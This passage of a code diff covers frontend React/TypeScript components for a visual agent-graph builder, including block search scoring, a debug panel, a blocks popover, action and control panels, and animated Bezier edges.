/ Block$/,
"",
);
node.data?.metadata?.customized_name ||
beautifyString(node.data?.blockType || "").replace(
/ Block$/,
"",
);
const nodeType = beautifyString(
node.data?.blockType || "",
).replace(/ Block$/, "");
return (
<TooltipProvider key={node.id}>
@@ -98,13 +100,7 @@ export const GraphSearchContent: React.FC<GraphSearchContentProps> = ({
onMouseLeave={() => onNodeHover?.(null)}
>
<div
className={`h-full w-3 rounded-l-[7px] ${
(node.data?.categories?.[0]?.category &&
categoryColorMap[
node.data.categories[0].category
]) ||
"bg-gray-300 dark:bg-slate-700"
}`}
className={`h-full w-3 rounded-l-[7px] ${getPrimaryCategoryColor(node.data?.categories)}`}
/>
<div className="mx-3 flex flex-1 items-center justify-between">
<div className="mr-2 min-w-0">
@@ -133,10 +129,9 @@ export const GraphSearchContent: React.FC<GraphSearchContentProps> = ({
<div className="font-semibold">
Node Type: {nodeType}
</div>
{!!node.data?.metadata?.customized_name && (
{node.data?.metadata?.customized_name && (
<div className="text-xs text-gray-500">
Custom Name:{" "}
{String(node.data.metadata.customized_name)}
Custom Name: {node.data.metadata.customized_name}
</div>
)}
</div>

View File

@@ -1,5 +1,5 @@
import { useState, useMemo, useDeferredValue } from "react";
import { CustomNode } from "../../../FlowEditor/nodes/CustomNode/CustomNode";
import { CustomNode } from "@/app/(platform)/build/components/legacy-builder/CustomNode/CustomNode";
import { beautifyString } from "@/lib/utils";
import jaro from "jaro-winkler";
@@ -67,10 +67,10 @@ function calculateNodeScore(
const nodeTitle = (node.data?.title || "").toLowerCase(); // This includes the ID
const nodeId = (node.id || "").toLowerCase();
const nodeDescription = (node.data?.description || "").toLowerCase();
const blockType = (node.data?.title || "").toLowerCase();
const blockType = (node.data?.blockType || "").toLowerCase();
const beautifiedBlockType = beautifyString(blockType).toLowerCase();
const customizedName = String(
node.data?.metadata?.customized_name || "",
const customizedName = (
node.data?.metadata?.customized_name || ""
).toLowerCase();
// Get input and output names with defensive checks

View File

@@ -1,18 +1,54 @@
import { GraphID } from "@/lib/autogpt-server-api";
import { useSearchParams } from "next/navigation";
import { useState } from "react";
export interface NewControlPanelProps {
// flowExecutionID: GraphExecutionID | undefined;
visualizeBeads?: "no" | "static" | "animate";
}
export const useNewControlPanel = ({
// flowExecutionID,
visualizeBeads: _visualizeBeads,
}: NewControlPanelProps) => {
const [blockMenuSelected, setBlockMenuSelected] = useState<
"save" | "block" | "search" | ""
>("");
const query = useSearchParams();
const _graphVersion = query.get("flowVersion");
const _graphVersionParsed = _graphVersion
? parseInt(_graphVersion)
: undefined;
const _flowID = (query.get("flowID") as GraphID | null) ?? undefined;
// const {
// agentDescription,
// setAgentDescription,
// saveAgent,
// agentName,
// setAgentName,
// savedAgent,
// isSaving,
// isRunning,
// isStopping,
// } = useAgentGraph(
// flowID,
// graphVersion,
// flowExecutionID,
// visualizeBeads !== "no",
// );
return {
blockMenuSelected,
setBlockMenuSelected,
// agentDescription,
// setAgentDescription,
// saveAgent,
// agentName,
// setAgentName,
// savedAgent,
// isSaving,
// isRunning,
// isStopping,
};
};

View File

@@ -0,0 +1,83 @@
import { useMemo } from "react";
import { Link } from "@/app/api/__generated__/models/link";
import { useEdgeStore } from "../stores/edgeStore";
import { useNodeStore } from "../stores/nodeStore";
import { scrollbarStyles } from "@/components/styles/scrollbars";
import { cn } from "@/lib/utils";
import { customEdgeToLink } from "./helper";
export const RightSidebar = () => {
const edges = useEdgeStore((s) => s.edges);
const nodes = useNodeStore((s) => s.nodes);
const backendLinks: Link[] = useMemo(
() => edges.map(customEdgeToLink),
[edges],
);
return (
<div
className={cn(
"flex h-full w-full flex-col border-l border-slate-200 bg-white p-4 dark:border-slate-700 dark:bg-slate-900",
scrollbarStyles,
)}
>
<div className="mb-4">
<h2 className="text-lg font-semibold text-slate-800 dark:text-slate-200">
Graph Debug Panel
</h2>
</div>
<div className="flex-1 overflow-y-auto">
<h3 className="mb-2 text-sm font-semibold text-slate-700 dark:text-slate-200">
Nodes ({nodes.length})
</h3>
<div className="mb-6 space-y-3">
{nodes.map((n) => (
<div
key={n.id}
className="rounded border p-2 text-xs dark:border-slate-700"
>
<div className="mb-1 font-medium">
#{n.id} {n.data?.title ? ` ${n.data.title}` : ""}
</div>
<div className="text-slate-500 dark:text-slate-400">
hardcodedValues
</div>
<pre className="mt-1 max-h-40 overflow-auto rounded bg-slate-50 p-2 dark:bg-slate-800">
{JSON.stringify(n.data?.hardcodedValues ?? {}, null, 2)}
</pre>
</div>
))}
</div>
<h3 className="mb-2 text-sm font-semibold text-slate-700 dark:text-slate-200">
Links ({backendLinks.length})
</h3>
<div className="mb-6 space-y-3">
{backendLinks.map((l) => (
<div
key={l.id}
className="rounded border p-2 text-xs dark:border-slate-700"
>
<div className="font-medium">
{l.source_id}[{l.source_name}] {l.sink_id}[{l.sink_name}]
</div>
<div className="mt-1 text-slate-500 dark:text-slate-400">
edge.id: {l.id}
</div>
</div>
))}
</div>
<h4 className="mb-2 text-xs font-semibold text-slate-600 dark:text-slate-300">
Backend Links JSON
</h4>
<pre className="max-h-64 overflow-auto rounded bg-slate-50 p-2 text-[11px] dark:bg-slate-800">
{JSON.stringify(backendLinks, null, 2)}
</pre>
</div>
</div>
);
};

View File

@@ -0,0 +1,443 @@
import React, { useCallback, useMemo, useState, useDeferredValue } from "react";
import { Card, CardContent, CardHeader } from "@/components/__legacy__/ui/card";
import { Label } from "@/components/__legacy__/ui/label";
import { Button } from "@/components/__legacy__/ui/button";
import { Input } from "@/components/__legacy__/ui/input";
import { TextRenderer } from "@/components/__legacy__/ui/render";
import { ScrollArea } from "@/components/__legacy__/ui/scroll-area";
import { CustomNode } from "@/app/(platform)/build/components/legacy-builder/CustomNode/CustomNode";
import { beautifyString } from "@/lib/utils";
import {
Popover,
PopoverContent,
PopoverTrigger,
} from "@/components/__legacy__/ui/popover";
import {
Block,
BlockIORootSchema,
BlockUIType,
GraphInputSchema,
GraphOutputSchema,
SpecialBlockID,
} from "@/lib/autogpt-server-api";
import { MagnifyingGlassIcon, PlusIcon } from "@radix-ui/react-icons";
import { IconToyBrick } from "@/components/__legacy__/ui/icons";
import { getPrimaryCategoryColor } from "@/lib/utils";
import {
Tooltip,
TooltipContent,
TooltipTrigger,
} from "@/components/atoms/Tooltip/BaseTooltip";
import { GraphMeta } from "@/lib/autogpt-server-api";
import jaro from "jaro-winkler";
import { getV1GetSpecificGraph } from "@/app/api/__generated__/endpoints/graphs/graphs";
import { okData } from "@/app/api/helpers";
type _Block = Omit<Block, "inputSchema" | "outputSchema"> & {
uiKey?: string;
inputSchema: BlockIORootSchema | GraphInputSchema;
outputSchema: BlockIORootSchema | GraphOutputSchema;
hardcodedValues?: Record<string, any>;
_cached?: {
blockName: string;
beautifiedName: string;
description: string;
};
};
// Hook to preprocess blocks with cached expensive operations
const useSearchableBlocks = (blocks: _Block[]): _Block[] => {
return useMemo(
() =>
blocks.map((block) => {
if (!block._cached) {
block._cached = {
blockName: block.name.toLowerCase(),
beautifiedName: beautifyString(block.name).toLowerCase(),
description: block.description.toLowerCase(),
};
}
return block;
}),
[blocks],
);
};
interface BlocksControlProps {
blocks: _Block[];
addBlock: (
id: string,
name: string,
hardcodedValues: Record<string, any>,
) => void;
pinBlocksPopover: boolean;
flows: GraphMeta[];
nodes: CustomNode[];
}
/**
* A React functional component that displays a control for managing blocks.
*
* @component
* @param {Object} BlocksControlProps - The properties for the BlocksControl component.
* @param {Block[]} BlocksControlProps.blocks - An array of blocks to be displayed and filtered.
* @param {(id: string, name: string) => void} BlocksControlProps.addBlock - A function to call when a block is added.
* @returns The rendered BlocksControl component.
*/
export function BlocksControl({
blocks: _blocks,
addBlock,
pinBlocksPopover,
flows,
nodes,
}: BlocksControlProps) {
const [searchQuery, setSearchQuery] = useState("");
const deferredSearchQuery = useDeferredValue(searchQuery);
const [selectedCategory, setSelectedCategory] = useState<string | null>(null);
const blocks = useSearchableBlocks(_blocks);
const graphHasWebhookNodes = nodes.some((n) =>
[BlockUIType.WEBHOOK, BlockUIType.WEBHOOK_MANUAL].includes(n.data.uiType),
);
const graphHasInputNodes = nodes.some(
(n) => n.data.uiType == BlockUIType.INPUT,
);
const filteredAvailableBlocks = useMemo(() => {
const blockList = blocks
.filter((b) => b.uiType !== BlockUIType.AGENT)
.sort((a, b) => a.name.localeCompare(b.name));
// Agent blocks are created from GraphMeta which doesn't include schemas.
// Schemas will be fetched on-demand when the block is actually added.
const agentBlockList = flows
.map((flow): _Block => {
return {
id: SpecialBlockID.AGENT,
name: flow.name,
description:
`Ver.${flow.version}` +
(flow.description ? ` | ${flow.description}` : ""),
categories: [{ category: "AGENT", description: "" }],
// Empty schemas - will be populated when block is added
inputSchema: { type: "object", properties: {} },
outputSchema: { type: "object", properties: {} },
staticOutput: false,
uiType: BlockUIType.AGENT,
costs: [],
uiKey: flow.id,
hardcodedValues: {
graph_id: flow.id,
graph_version: flow.version,
// Schemas will be fetched on-demand when block is added
},
};
})
.map(
(agentBlock): _Block => ({
...agentBlock,
_cached: {
blockName: agentBlock.name.toLowerCase(),
beautifiedName: beautifyString(agentBlock.name).toLowerCase(),
description: agentBlock.description.toLowerCase(),
},
}),
);
return blockList
.concat(agentBlockList)
.map((block) => ({
block,
score: blockScoreForQuery(block, deferredSearchQuery),
}))
.filter(
({ block, score }) =>
score > 0 &&
(!selectedCategory ||
block.categories.some((cat) => cat.category === selectedCategory)),
)
.sort((a, b) => b.score - a.score)
.map(({ block }) => ({
...block,
notAvailable:
(block.uiType == BlockUIType.WEBHOOK &&
graphHasWebhookNodes &&
"Agents can only have one webhook-triggered block") ||
(block.uiType == BlockUIType.WEBHOOK &&
graphHasInputNodes &&
"Webhook-triggered blocks can't be used together with input blocks") ||
(block.uiType == BlockUIType.INPUT &&
graphHasWebhookNodes &&
"Input blocks can't be used together with a webhook-triggered block") ||
null,
}));
}, [
blocks,
flows,
selectedCategory,
deferredSearchQuery,
graphHasInputNodes,
graphHasWebhookNodes,
]);
const resetFilters = useCallback(() => {
setSearchQuery("");
setSelectedCategory(null);
}, []);
// Handler to add a block, fetching graph data on-demand for agent blocks
const handleAddBlock = useCallback(
async (block: _Block & { notAvailable: string | null }) => {
if (block.notAvailable) return;
// For agent blocks, fetch the full graph to get schemas
if (block.uiType === BlockUIType.AGENT && block.hardcodedValues) {
const graphID = block.hardcodedValues.graph_id as string;
const graphVersion = block.hardcodedValues.graph_version as number;
const graphData = okData(
await getV1GetSpecificGraph(graphID, { version: graphVersion }),
);
if (graphData) {
addBlock(block.id, block.name, {
...block.hardcodedValues,
input_schema: graphData.input_schema,
output_schema: graphData.output_schema,
});
} else {
// Fallback: add without schemas (will be incomplete)
console.error("Failed to fetch graph data for agent block");
addBlock(block.id, block.name, block.hardcodedValues || {});
}
} else {
addBlock(block.id, block.name, block.hardcodedValues || {});
}
},
[addBlock],
);
// Extract unique categories from blocks
const categories = useMemo(() => {
return Array.from(
new Set([
null,
...blocks
.flatMap((block) => block.categories.map((cat) => cat.category))
.sort(),
]),
);
}, [blocks]);
return (
<Popover
open={pinBlocksPopover ? true : undefined}
onOpenChange={(open) => open || resetFilters()}
>
<Tooltip delayDuration={500}>
<TooltipTrigger asChild>
<PopoverTrigger asChild>
<Button
variant="ghost"
size="icon"
data-id="blocks-control-popover-trigger"
data-testid="blocks-control-blocks-button"
name="Blocks"
className="dark:hover:bg-slate-800"
>
<IconToyBrick />
</Button>
</PopoverTrigger>
</TooltipTrigger>
<TooltipContent side="right">Blocks</TooltipContent>
</Tooltip>
<PopoverContent
side="right"
sideOffset={22}
align="start"
className="absolute -top-3 w-[17rem] rounded-xl border-none p-0 shadow-none md:w-[30rem]"
data-id="blocks-control-popover-content"
>
<Card className="p-3 pb-0 dark:bg-slate-900">
<CardHeader className="flex flex-col gap-x-8 gap-y-1 p-3 px-2">
<div className="items-center justify-between">
<Label
htmlFor="search-blocks"
className="whitespace-nowrap text-base font-bold text-black dark:text-white 2xl:text-xl"
data-id="blocks-control-label"
data-testid="blocks-control-blocks-label"
>
Blocks
</Label>
</div>
<div className="relative flex items-center">
<MagnifyingGlassIcon className="absolute m-2 h-5 w-5 text-gray-500 dark:text-gray-400" />
<Input
id="search-blocks"
type="text"
placeholder="Search blocks"
value={searchQuery}
onChange={(e) => setSearchQuery(e.target.value)}
className="rounded-lg px-8 py-5 dark:bg-slate-800 dark:text-white"
data-id="blocks-control-search-input"
autoComplete="off"
/>
</div>
<div
className="mt-2 flex flex-wrap gap-2"
data-testid="blocks-categories-list"
>
{categories.map((category) => {
const color = getPrimaryCategoryColor([
{ category: category || "All", description: "" },
]);
const colorClass =
selectedCategory === category ? `${color}` : "";
return (
<div
key={category}
data-testid="blocks-category"
role="button"
className={`cursor-pointer rounded-xl border px-2 py-2 text-xs font-medium dark:border-slate-700 dark:text-white ${colorClass}`}
onClick={() =>
setSelectedCategory(
selectedCategory === category ? null : category,
)
}
>
{beautifyString((category || "All").toLowerCase())}
</div>
);
})}
</div>
</CardHeader>
<CardContent className="overflow-scroll border-t border-t-gray-200 p-0 dark:border-t-slate-700">
<ScrollArea
className="h-[60vh] w-full"
data-id="blocks-control-scroll-area"
>
{filteredAvailableBlocks.map((block) => (
<Card
key={block.uiKey || block.id}
className={`m-2 my-4 flex h-20 shadow-none dark:border-slate-700 dark:bg-slate-800 dark:text-slate-100 dark:hover:bg-slate-700 ${
block.notAvailable
? "cursor-not-allowed opacity-50"
: "cursor-move hover:shadow-lg"
}`}
data-id={`block-card-${block.id}`}
draggable={!block.notAvailable}
onDragStart={(e) => {
if (block.notAvailable) return;
e.dataTransfer.effectAllowed = "copy";
e.dataTransfer.setData(
"application/reactflow",
JSON.stringify({
blockId: block.id,
blockName: block.name,
hardcodedValues: block?.hardcodedValues || {},
}),
);
}}
onClick={() => handleAddBlock(block)}
title={block.notAvailable ?? undefined}
>
<div
className={`-ml-px h-full w-3 rounded-l-xl ${getPrimaryCategoryColor(block.categories)}`}
></div>
<div className="mx-3 flex flex-1 items-center justify-between">
<div className="mr-2 min-w-0">
<span
className="block truncate pb-1 text-sm font-semibold dark:text-white"
data-id={`block-name-${block.id}`}
data-type={block.uiType}
data-testid={`block-name-${block.id}`}
>
<TextRenderer
value={beautifyString(block.name).replace(
/ Block$/,
"",
)}
truncateLengthLimit={45}
/>
</span>
<span
className="block break-all text-xs font-normal text-gray-500 dark:text-gray-400"
data-testid={`block-description-${block.id}`}
>
<TextRenderer
value={block.description}
truncateLengthLimit={165}
/>
</span>
</div>
<div
className="flex flex-shrink-0 items-center gap-1"
data-id={`block-tooltip-${block.id}`}
data-testid={`block-add`}
>
<PlusIcon className="h-6 w-6 rounded-lg bg-gray-200 stroke-black stroke-[0.5px] p-1 dark:bg-gray-700 dark:stroke-white" />
</div>
</div>
</Card>
))}
</ScrollArea>
</CardContent>
</Card>
</PopoverContent>
</Popover>
);
}
/**
* Evaluates how well a block matches the search query and returns a relevance score.
* The scoring algorithm works as follows:
* - Returns 1 if no query (all blocks match equally)
* - Normalized query for case-insensitive matching
* - Returns 3 for exact substring matches in block name (highest priority)
* - Returns 2 when all query words appear in the block name (regardless of order)
* - Returns 1.X for blocks with names similar to query using Jaro-Winkler distance (X is similarity score)
* - Returns 0.5 when all query words appear in the block description (lowest priority)
* - Returns 0 for no match
*
* Higher scores will appear first in search results.
*/
function blockScoreForQuery(block: _Block, query: string): number {
if (!query) return 1;
const normalizedQuery = query.toLowerCase().trim();
const queryWords = normalizedQuery.split(/\s+/);
// Use cached values for performance
const { blockName, beautifiedName, description } = block._cached!;
// 1. Exact match in name (highest priority)
if (
blockName.includes(normalizedQuery) ||
beautifiedName.includes(normalizedQuery)
) {
return 3;
}
// 2. All query words in name (regardless of order)
const allWordsInName = queryWords.every(
(word) => blockName.includes(word) || beautifiedName.includes(word),
);
if (allWordsInName) return 2;
// 3. Similarity with name (Jaro-Winkler)
const similarityThreshold = 0.65;
const nameSimilarity = jaro(blockName, normalizedQuery);
const beautifiedSimilarity = jaro(beautifiedName, normalizedQuery);
const maxSimilarity = Math.max(nameSimilarity, beautifiedSimilarity);
if (maxSimilarity > similarityThreshold) {
return 1 + maxSimilarity; // Score between 1 and 2
}
// 4. All query words in description (lower priority)
const allWordsInDescription = queryWords.every((word) =>
description.includes(word),
);
if (allWordsInDescription) return 0.5;
return 0;
}

View File

@@ -0,0 +1,119 @@
import React from "react";
import { cn } from "@/lib/utils";
import { Button } from "@/components/__legacy__/ui/button";
import { LogOut } from "lucide-react";
import { ClockIcon, WarningIcon } from "@phosphor-icons/react";
import { IconPlay, IconSquare } from "@/components/__legacy__/ui/icons";
interface Props {
onClickAgentOutputs?: () => void;
onClickRunAgent?: () => void;
onClickStopRun: () => void;
onClickScheduleButton?: () => void;
isRunning: boolean;
isDisabled: boolean;
className?: string;
resolutionModeActive?: boolean;
}
export const BuildActionBar: React.FC<Props> = ({
onClickAgentOutputs,
onClickRunAgent,
onClickStopRun,
onClickScheduleButton,
isRunning,
isDisabled,
className,
resolutionModeActive = false,
}) => {
const buttonClasses =
"flex items-center gap-2 text-sm font-medium md:text-lg";
// Show resolution mode message instead of action buttons
if (resolutionModeActive) {
return (
<div
className={cn(
"flex w-fit select-none items-center justify-center p-4",
className,
)}
>
<div className="flex items-center gap-3 rounded-lg border border-amber-300 bg-amber-50 px-4 py-3 dark:border-amber-700 dark:bg-amber-900/30">
<WarningIcon className="size-5 text-amber-600 dark:text-amber-400" />
<span className="text-sm font-medium text-amber-800 dark:text-amber-200">
Remove incompatible connections to continue
</span>
</div>
</div>
);
}
return (
<div
className={cn(
"flex w-fit select-none items-center justify-center p-4",
className,
)}
>
<div className="flex gap-1 md:gap-4">
{onClickAgentOutputs && (
<Button
className={buttonClasses}
variant="outline"
size="primary"
onClick={onClickAgentOutputs}
title="View agent outputs"
>
<LogOut className="hidden size-5 md:flex" /> Agent Outputs
</Button>
)}
{!isRunning ? (
<Button
className={cn(
buttonClasses,
onClickRunAgent && isDisabled
? "cursor-default opacity-50 hover:bg-accent"
: "",
)}
variant="accent"
size="primary"
onClick={onClickRunAgent}
disabled={!onClickRunAgent}
title="Run the agent"
aria-label="Run the agent"
data-testid="primary-action-run-agent"
data-tutorial-id="primary-action-run-agent"
>
<IconPlay /> Run
</Button>
) : (
<Button
className={buttonClasses}
variant="destructive"
size="primary"
onClick={onClickStopRun}
title="Stop the agent"
data-id="primary-action-stop-agent"
>
<IconSquare /> Stop
</Button>
)}
{onClickScheduleButton && (
<Button
className={buttonClasses}
variant="outline"
size="primary"
onClick={onClickScheduleButton}
title="Set up a run schedule for the agent"
data-id="primary-action-schedule-agent"
>
<ClockIcon className="hidden h-5 w-5 md:flex" />
Schedule Run
</Button>
)}
</div>
</div>
);
};

View File

@@ -0,0 +1,33 @@
import {
BaseEdge,
ConnectionLineComponentProps,
Node,
getBezierPath,
Position,
} from "@xyflow/react";
export default function ConnectionLine<NodeType extends Node>({
fromPosition,
fromHandle,
fromX,
fromY,
toPosition,
toX,
toY,
}: ConnectionLineComponentProps<NodeType>) {
const sourceX =
fromPosition === Position.Right
? fromX + ((fromHandle?.width ?? 0) / 2 - 5)
: fromX - ((fromHandle?.width ?? 0) / 2 - 5);
const [path] = getBezierPath({
sourceX: sourceX,
sourceY: fromY,
sourcePosition: fromPosition,
targetX: toX,
targetY: toY,
targetPosition: toPosition,
});
return <BaseEdge path={path} style={{ strokeWidth: 2, stroke: "#555" }} />;
}

View File

@@ -0,0 +1,86 @@
import { Card, CardContent } from "@/components/__legacy__/ui/card";
import {
Tooltip,
TooltipContent,
TooltipTrigger,
} from "@/components/atoms/Tooltip/BaseTooltip";
import { Button } from "@/components/__legacy__/ui/button";
import { Separator } from "@/components/__legacy__/ui/separator";
import { cn } from "@/lib/utils";
import React from "react";
/**
* Represents a control element for the ControlPanel Component.
* @type {Object} Control
* @property {React.ReactNode} icon - The icon of the control from lucide-react https://lucide.dev/icons/
* @property {string} label - The label of the control, to be leveraged by ToolTip.
* @property {onclick} onClick - The function to be executed when the control is clicked.
*/
export type Control = {
icon: React.ReactNode;
label: string;
disabled?: boolean;
onClick: () => void;
};
interface ControlPanelProps {
controls: Control[];
topChildren?: React.ReactNode;
botChildren?: React.ReactNode;
className?: string;
}
/**
* ControlPanel component displays a panel with controls as icons.tsx with the ability to take in children.
* @param {Object} ControlPanelProps - The properties of the control panel component.
* @param {Array} ControlPanelProps.controls - An array of control objects representing actions to be preformed.
* @param {Array} ControlPanelProps.children - The child components of the control panel.
* @param {string} ControlPanelProps.className - Additional CSS class names for the control panel.
* @returns The rendered control panel component.
*/
export const ControlPanel = ({
controls,
topChildren,
botChildren,
className,
}: ControlPanelProps) => {
return (
<Card className={cn("m-4 mt-24 w-14 dark:bg-slate-900", className)}>
<CardContent className="p-0">
<div className="flex flex-col items-center gap-3 rounded-xl py-3">
{topChildren}
<Separator className="dark:bg-slate-700" />
{controls.map((control, index) => (
<Tooltip key={index} delayDuration={500}>
<TooltipTrigger asChild>
<div>
<Button
variant="ghost"
size="icon"
onClick={() => control.onClick()}
data-id={`control-button-${index}`}
data-testid={`blocks-control-${control.label.toLowerCase()}-button`}
disabled={control.disabled || false}
className="dark:bg-slate-900 dark:text-slate-100 dark:hover:bg-slate-800"
>
{control.icon}
<span className="sr-only">{control.label}</span>
</Button>
</div>
</TooltipTrigger>
<TooltipContent
side="right"
className="dark:bg-slate-800 dark:text-slate-100"
>
{control.label}
</TooltipContent>
</Tooltip>
))}
<Separator className="dark:bg-slate-700" />
{botChildren}
</div>
</CardContent>
</Card>
);
};
export default ControlPanel;

View File

@@ -0,0 +1,240 @@
import React, {
useCallback,
useContext,
useEffect,
useState,
useRef,
} from "react";
import {
BaseEdge,
EdgeLabelRenderer,
EdgeProps,
useReactFlow,
XYPosition,
Edge,
Node,
} from "@xyflow/react";
import "./customedge.css";
import { X } from "lucide-react";
import { BuilderContext } from "../Flow/Flow";
import { NodeExecutionResult } from "@/lib/autogpt-server-api";
import { useCustomEdge } from "./useCustomEdge";
export type CustomEdgeData = {
edgeColor: string;
sourcePos?: XYPosition;
isStatic?: boolean;
beadUp: number;
beadDown: number;
beadData?: Map<string, NodeExecutionResult["status"]>;
};
type Bead = {
t: number;
targetT: number;
startTime: number;
};
export type CustomEdge = Edge<CustomEdgeData, "custom">;
export function CustomEdge({
id,
data,
selected,
sourceX,
sourceY,
targetX,
targetY,
markerEnd,
}: EdgeProps<CustomEdge>) {
const [beads, setBeads] = useState<{
beads: Bead[];
created: number;
destroyed: number;
}>({ beads: [], created: 0, destroyed: 0 });
const beadsRef = useRef(beads);
const { svgPath, length, getPointForT, getTForDistance } = useCustomEdge(
sourceX - 5,
sourceY - 5,
targetX + 3,
targetY - 5,
);
const { deleteElements } = useReactFlow<Node, CustomEdge>();
const builderContext = useContext(BuilderContext);
const { visualizeBeads } = builderContext ?? {
visualizeBeads: "no",
};
// Check if this edge is broken (during resolution mode)
const isBroken =
builderContext?.resolutionMode?.active &&
builderContext?.resolutionMode?.brokenEdgeIds?.includes(id);
const onEdgeRemoveClick = () => {
deleteElements({ edges: [{ id }] });
};
const animationDuration = 500; // Duration in milliseconds for bead to travel the curve
const beadDiameter = 12;
const deltaTime = 16;
const setTargetPositions = useCallback(
(beads: Bead[]) => {
const distanceBetween = Math.min(
(length - beadDiameter) / (beads.length + 1),
beadDiameter,
);
return beads.map((bead, index) => {
const distanceFromEnd = beadDiameter * 1.35;
const targetPosition = distanceBetween * index + distanceFromEnd;
const t = getTForDistance(-targetPosition);
return {
...bead,
t: visualizeBeads === "animate" ? bead.t : t,
targetT: t,
} as Bead;
});
},
[getTForDistance, length, visualizeBeads],
);
beadsRef.current = beads;
useEffect(() => {
const beadUp: number = data?.beadUp ?? 0;
const beadDown: number = data?.beadDown ?? 0;
if (
beadUp === 0 &&
beadDown === 0 &&
(beads.created > 0 || beads.destroyed > 0)
) {
setBeads({ beads: [], created: 0, destroyed: 0 });
return;
}
// Add beads
if (beadUp > beads.created) {
setBeads(({ beads, created, destroyed }) => {
const newBeads = [];
for (let i = 0; i < beadUp - created; i++) {
newBeads.push({ t: 0, targetT: 0, startTime: Date.now() });
}
const b = setTargetPositions([...beads, ...newBeads]);
return { beads: b, created: beadUp, destroyed };
});
}
// Animate and remove beads
const interval = setInterval(
({ current: beads }) => {
// If there are no beads visible or moving, stop re-rendering
if (
(beadUp === beads.created && beads.created === beads.destroyed) ||
beads.beads.every((bead) => bead.t >= bead.targetT)
) {
clearInterval(interval);
return;
}
setBeads(({ beads, created, destroyed }) => {
let destroyedCount = 0;
const newBeads = beads
.map((bead) => {
const progressIncrement = deltaTime / animationDuration;
const t = Math.min(
bead.t + bead.targetT * progressIncrement,
bead.targetT,
);
return { ...bead, t };
})
.filter((bead, index) => {
const removeCount = beadDown - destroyed;
if (bead.t >= bead.targetT && index < removeCount) {
destroyedCount++;
return false;
}
return true;
});
return {
beads: setTargetPositions(newBeads),
created,
destroyed: destroyed + destroyedCount,
};
});
},
deltaTime,
beadsRef,
);
return () => clearInterval(interval);
}, [data?.beadUp, data?.beadDown, setTargetPositions, visualizeBeads]);
const middle = getPointForT(0.5);
// Determine edge color - red for broken edges
const baseColor = data?.edgeColor ?? "#555555";
const edgeColor = isBroken ? "#ef4444" : baseColor;
// Add opacity to hex color (99 = 60% opacity, 80 = 50% opacity)
const strokeColor = isBroken
? `${edgeColor}99`
: selected
? edgeColor
: `${edgeColor}80`;
return (
<>
<BaseEdge
path={svgPath}
markerEnd={markerEnd}
style={{
stroke: strokeColor,
strokeWidth: data?.isStatic ? 2.5 : 2,
strokeDasharray: data?.isStatic ? "5 3" : undefined,
}}
className="data-sentry-unmask transition-all duration-200"
/>
<path
d={svgPath}
fill="none"
strokeOpacity={0}
strokeWidth={20}
className="data-sentry-unmask react-flow__edge-interaction"
/>
<EdgeLabelRenderer>
<div
style={{
position: "absolute",
transform: `translate(-50%, -50%) translate(${middle.x}px,${middle.y}px)`,
pointerEvents: "all",
}}
className="edge-label-renderer"
>
<button
className="edge-label-button opacity-0 transition-opacity duration-200 hover:opacity-100"
onClick={onEdgeRemoveClick}
>
<X className="size-4" />
</button>
</div>
</EdgeLabelRenderer>
{beads.beads.map((bead, index) => {
const pos = getPointForT(bead.t);
return (
<circle
key={index}
cx={pos.x}
cy={pos.y}
r={beadDiameter / 2} // Bead radius
fill={data?.edgeColor ?? "#555555"}
/>
);
})}
</>
);
}

View File

@@ -0,0 +1,48 @@
.edge-label-renderer {
position: absolute;
pointer-events: all;
}
.edge-label-button {
width: 20px;
height: 20px;
background: #eee;
border: 1px solid #fff;
cursor: pointer;
border-radius: 50%;
display: flex;
justify-content: center;
align-items: center;
padding: 0;
color: #555;
opacity: 0;
transition:
opacity 0.2s ease-in-out,
background-color 0.2s ease-in-out;
}
.edge-label-button.visible {
opacity: 1;
}
.edge-label-button:hover {
box-shadow: 0 0 6px 2px rgba(0, 0, 0, 0.08);
background: #f0f0f0;
}
.edge-label-button svg {
width: 14px;
height: 14px;
}
.react-flow__edge-interaction {
cursor: pointer;
}
.react-flow__edges > svg:has(> g.selected) {
z-index: 10 !important;
}
.react-flow__edgelabel-renderer {
z-index: 11 !important;
}

View File

@@ -0,0 +1,157 @@
import { useCallback, useMemo } from "react";
type XYPosition = {
x: number;
y: number;
};
export type BezierPath = {
sourcePosition: XYPosition;
control1: XYPosition;
control2: XYPosition;
targetPosition: XYPosition;
};
export function useCustomEdge(
sourceX: number,
sourceY: number,
targetX: number,
targetY: number,
) {
const path: BezierPath = useMemo(() => {
const xDifference = Math.abs(sourceX - targetX);
const yDifference = Math.abs(sourceY - targetY);
const xControlDistance =
sourceX < targetX ? 64 : Math.max(xDifference / 2, 64);
const yControlDistance = yDifference < 128 && sourceX > targetX ? -64 : 0;
return {
sourcePosition: { x: sourceX, y: sourceY },
control1: {
x: sourceX + xControlDistance,
y: sourceY + yControlDistance,
},
control2: {
x: targetX - xControlDistance,
y: targetY + yControlDistance,
},
targetPosition: { x: targetX, y: targetY },
};
}, [sourceX, sourceY, targetX, targetY]);
const svgPath = useMemo(
() =>
`M ${path.sourcePosition.x} ${path.sourcePosition.y} ` +
`C ${path.control1.x} ${path.control1.y} ${path.control2.x} ${path.control2.y} ` +
`${path.targetPosition.x}, ${path.targetPosition.y}`,
[path],
);
const getPointForT = useCallback(
(t: number) => {
// Bezier formula: (1-t)^3 * p0 + 3*(1-t)^2*t*p1 + 3*(1-t)*t^2*p2 + t^3*p3
const x =
Math.pow(1 - t, 3) * path.sourcePosition.x +
3 * Math.pow(1 - t, 2) * t * path.control1.x +
3 * (1 - t) * Math.pow(t, 2) * path.control2.x +
Math.pow(t, 3) * path.targetPosition.x;
const y =
Math.pow(1 - t, 3) * path.sourcePosition.y +
3 * Math.pow(1 - t, 2) * t * path.control1.y +
3 * (1 - t) * Math.pow(t, 2) * path.control2.y +
Math.pow(t, 3) * path.targetPosition.y;
return { x, y };
},
[path],
);
const getArcLength = useCallback(
(t: number, samples: number = 100) => {
let length = 0;
let prevPoint = getPointForT(0);
for (let i = 1; i <= samples; i++) {
const currT = (i / samples) * t;
const currPoint = getPointForT(currT);
length += Math.sqrt(
Math.pow(currPoint.x - prevPoint.x, 2) +
Math.pow(currPoint.y - prevPoint.y, 2),
);
prevPoint = currPoint;
}
return length;
},
[getPointForT],
);
const length = useMemo(() => {
return getArcLength(1);
}, [getArcLength]);
const getBezierDerivative = useCallback(
(t: number) => {
const mt = 1 - t;
const x =
3 *
(mt * mt * (path.control1.x - path.sourcePosition.x) +
2 * mt * t * (path.control2.x - path.control1.x) +
t * t * (path.targetPosition.x - path.control2.x));
const y =
3 *
(mt * mt * (path.control1.y - path.sourcePosition.y) +
